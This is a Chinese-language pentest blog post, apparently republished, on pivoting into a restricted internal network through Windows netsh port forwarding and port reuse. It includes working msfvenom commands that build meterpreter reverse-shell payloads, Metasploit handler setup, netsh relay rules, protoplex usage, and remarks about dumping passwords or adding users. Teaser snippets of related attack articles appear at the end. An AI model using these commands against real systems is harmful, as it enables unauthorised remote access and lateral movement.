<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網--端口轉發以及端口復用

    上官雨寶2022-07-15 17:03:00

    內網--端口轉發以及端口復用

    前言

    前段時間在一次內網中遇到了一個問題,當時想了很多辦法,雖然最終沒能解決但是也學了很多東西。

    現在想想也是很愁。

    情景再現

    大致情況就是現在處于192的網段然后有一個172網段機器的mssql賬號(可以執行命令和上傳文件),并且172網段上的這臺服務器只對192這臺機器開放了1433端口,需要到172的網段。

    一張圖簡單明了。

    端口復用

    雖然最終沒能解決問題,但是也是學到了不少方法來應對相似的情況。

    1、netsh

    netsh(Network Shell) 是一個windows系統本身提供的功能強大的網絡配置命令行工具,可以查看或更改本地計算機或遠程計算機的網絡配置。

    場景1

    假如,就是說假如咱們這里放開一下限制規則 172的網段依然不出網,且只對192網段開放1433端口,但是172可以訪問192的網段。那這樣咱們可以通過172機器反向連接192機器然后在192機器做端口轉發到攻擊機器上的監聽端口,這里在本地復現改了一下ip 如下圖:

    以及修改目標機器的防火潛規則確保其他的端口無法被訪問。

    使用msf生成反彈馬,然后將木馬上傳到目標機器。

    msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=10.211.55.10 LPORT=6767  -i 3 -f exe -o o.exe
    

    然后我們在10.211.5.10這臺機器通過netsh設置端口轉發將6767轉發到攻擊機的監聽端口。

    netsh interface portproxy add v4tov4 listenport=6767 connectport=6767 connectaddress=192.168.49.129
    

    在攻擊機上設置監聽,然后在目標機器上執行木馬。

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.49.129
    set lport 6767
    

    攻擊機器成功收到會話。

    場景2

    在場景1中我們的目標機器可以隨意訪問我們跳板機5.10的任意端口,假如我們這邊開始增加限制目標機器不能隨意訪問跳板機器的端口,只能訪問指定端口比如:80、445、1433、1521、3306、3389、6379、8080,這其中的一個或者多個端口,如下圖。

    和上面一樣通過ms生成反向連接馬以及上傳到目標服務器,設置連接端口為80.

    msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=10.211.55.10 LPORT=80  -i 3 -f exe -o o.exe
    

    這里為了嚴謹依然通過防火墻設置端口限制,80可以訪問到,其他端口均不能訪問。

    然后通過netsh設置端口轉發。

    netsh interface portproxy add v4tov4 listenport=80 connectport=6767 connectaddress=192.168.49.129
    

    然后在目標機器上執行木馬,我們通過端口連接可以看到目標機器與跳板機的80端口進行了連接且跳板機也收到連接,但是跳板機的80端口并沒有轉發到攻擊機的監聽端口,如下圖。

    我們攻擊機也同樣沒有收到回話。

    繼續測試3306端口(只對目標機器開放3306,其他端口均禁止),步驟同上我們這邊直接跳過重復步驟,直接到執行木馬,然后我們可以發現msf成功的接受到了會話,如下圖。

    端口正常轉發。

    經過測試發現3306和8080可以正常的進行轉發80、445、1433、3389、6379等不可轉發猜測下是windows自帶的一些服務可能都不支持這種情況。

    場景3

    我們繼續增加限制條件在場景2中我們的目標機器可以訪問我們跳板機5.10的個別端口,假如我們這邊開始增加限制目標機器不能訪問跳板機器的端口,但是我們也不是只能訪問目標機器的1433,我們這次增加一個別的端口80或者3306等,如下圖。

    我們先討論80端口的情況,這個就比較簡單直接看是什么web服務然后上傳對應的shell連接就可以了(Neo-reGeorg)。

    然后是3306,我們依然可以通過netsh進行端口轉發列出一個最簡單的方式就是將目標機器上的3306端口轉發到3389端口上。

    netsh interface portproxy add v4tov4 listenport=3306 listenaddress=10.211.55.5 connectport=3389 connectaddress=10.211.55.5
    

    然后我們可以讀密碼或者加用戶,再通過跳板機去連接遠程桌面這里直接連接3306端口。

    經過測試這種情況下有很多端口是不可以這樣轉發的就比如iis開放的80端口,已經mssql的1433端口,但是像3306、8080這種端口是可以被轉發的,所以實際不同情況需要多嘗試(這里實驗時差點把自己繞進去)。

    2、工具

    protoplex

    這是一個協議復用的工具,比如命令可將本地9999端口的流量根據協議類型轉到本地的2333和80端口,這里我做了一下實驗,發現該工具的監聽端口不能被占用也不能是3306、1433、3389這種的特殊端口。

    他可以監聽10.211.55.5:4444,如果是socks5協議的流量就將流量轉發給10.211.55.5:9999,如果是http流量,就將流量轉發給10.211.55.5:80

    protoplex_windows_amd64.exe --socks5 10.211.55.5:9999 --http 10.211.55.5:80 -b 10.211.55.5:4444
    

    其他機器訪問

    socks5測試不理想,最終也是沒能解決這個問題。

    期待找到解決辦法。

    文章轉自公眾號: Tide安全團隊

    端口轉發服務器端口
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    reGeorg是reDuh的繼承者,利用了會話層的socks5協議,主要功能是把內網服務器端的數據通過的數據通過HTTP/HTTPS隧道轉發到本機,實現基于HTTP協議的通信。
    提權需要的東西有點兒多,筆記里出現的工具不建議在百度上下載。如果支持aspx,可以上傳aspx,通過aspx大馬,直接調用默認cmd掃描掃出了其他人的大馬可以嘗試用?
    起因,由于前幾天拿了一個菠菜站的webshell,但是只有iis權限,執行無法創建用戶等操作,更無法對整個服務器進行控制了,于是此時便需要提權了,對于一個剛剛入門的小白來說,此刻真正意識到了提權的重要性,于是便開始學習提取相關知識,以拿下該菠菜的站點。提權前的準備工作1,通常來說,不同的腳本所處的權限是不一樣的。
    隱藏通信隧道技術常用于在訪問受限的網絡環境中或不受信任的網絡中實現安全的數據傳輸。網絡層:IPV6隧道、ICMP隧道、GRE隧道傳輸層:TCP隧道、UDP隧道、常規端口轉發應用層:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道常規判斷內網連通性的方法都有哪些?
    網絡隧道技術指的是利用一種網絡協議來傳輸另一種網絡協議,它主要利用網絡隧道協議來實現這種功能。網絡隧道技術涉及了三種網絡協議,即網絡隧道協議、隧道協議下面的承載協議和隧道協議所承載的被承載協議。 在安全人員人員的日常工作中,會遇到因為相關配置或設備導致的無法和目標設備通信的狀況,這時就可以嘗試使用隧道通信解決。
    驗證子域郵箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源滲透物理滲透、物理攻擊、近源滲透,這幾個的意思都是在接近目標進行安全測試。Wi-Fi網線沒有終端準入控制,直接插網線 DHCP 獲取 IP。Bad USBBlack Hat 上提出 Bad USB。社會工程學在信息收集過程中就開始。釣魚本質是利用人的信任。Windows 主機FTP服務端開啟 FTP 服務。使用 certutil 下載的文件會原封不動在?目錄下保存一份,文件名位隨機字符,使用 delete 可以刪除剛下載的緩存。
    內網滲透主要是基于前期外圍打點getshell的webserver,通過收集webserver上的信息,然后對其他內網主機進行令上的攻擊,當然也有一些基于漏洞的攻擊。
    0x00 Preface內網滲透主要是基于前期外圍打點getshell的webserver,通過收集webserver上的信息,然后對其他內網主機進行令上的攻擊,當然也有一些基于漏洞的攻擊。當然,概念是生澀難懂的,結合實際環境會有助于理解。實際上有很多優秀的集成化工具,很少會拆分開來單獨使用這些方法。當然,大多數情況下是要考慮免殺的,免殺時可能會將某一步操作拆分出來,單獨進行免殺和利用。
    0x00 Preface內網滲透主要是基于前期外圍打點getshell的webserver,通過收集webserver上的信息,然后對其他內網主機進行令上的攻擊,當然也有一些基于漏洞的攻擊。當然,概念是生澀難懂的,結合實際環境會有助于理解。實際上有很多優秀的集成化工具,很少會拆分開來單獨使用這些方法。當然,大多數情況下是要考慮免殺的,免殺時可能會將某一步操作拆分出來,單獨進行免殺和利用。
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    上官雨寶
    是水水水水是
      亚洲 欧美 自拍 唯美 另类